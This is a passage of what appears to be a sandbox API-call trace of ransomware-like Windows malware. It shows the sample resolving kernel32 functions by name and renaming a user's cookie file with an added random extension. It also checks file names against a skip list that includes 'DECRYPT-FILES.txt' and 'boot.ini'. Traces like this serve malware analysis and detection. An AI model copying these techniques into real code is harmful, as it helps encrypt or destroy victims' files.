lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.426] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.426] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.426] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.426] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.426] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.426] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.426] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.427] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.427] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.427] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.427] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.427] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.427] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.427] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.427] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.427] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.427] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.427] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.427] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.427] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.427] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.427] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.427] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.427] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.427] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.427] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.428] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.428] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.428] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.428] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.428] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.428] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.428] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.428] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.428] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.428] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.428] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.428] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.428] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.428] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.428] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.428] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.428] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.428] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.429] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.429] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.429] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.429] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.429] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.429] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.429] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.429] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.429] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.429] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.429] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.429] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.429] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.429] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.429] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.429] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.429] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.429] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.430] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.430] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.430] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.430] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.430] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.430] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.430] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.430] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.430] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.430] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.430] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.430] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.430] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.430] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.430] lstrlenA (lpString="DELETEATOM") returned 10 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.430] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.430] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.430] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.430] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.431] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.431] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.431] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.431] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.431] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.431] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.431] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.431] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.431] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.431] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.431] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.431] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.431] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.431] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.431] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.432] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.432] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.432] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.433] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.433] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.433] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.433] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.433] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.433] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.433] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.433] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.433] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.433] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.433] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.433] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.433] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.433] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.433] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.433] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.434] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.434] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.434] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.434] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.434] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt") returned 110 [0079.434] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA") returned 116 [0079.434] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzHA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.zqzha"), dwFlags=0x0) returned 1 [0079.435] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.435] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.435] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.435] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64e777a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x64e777a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x64e777a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x21f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[4].txt", cAlternateFileName="5P3B8C~1.TXT")) returned 1 [0079.435] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.435] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="autorun.inf") returned -1 [0079.435] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", lpString2="boot.ini") returned -1 [0079.435] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[4].txt", 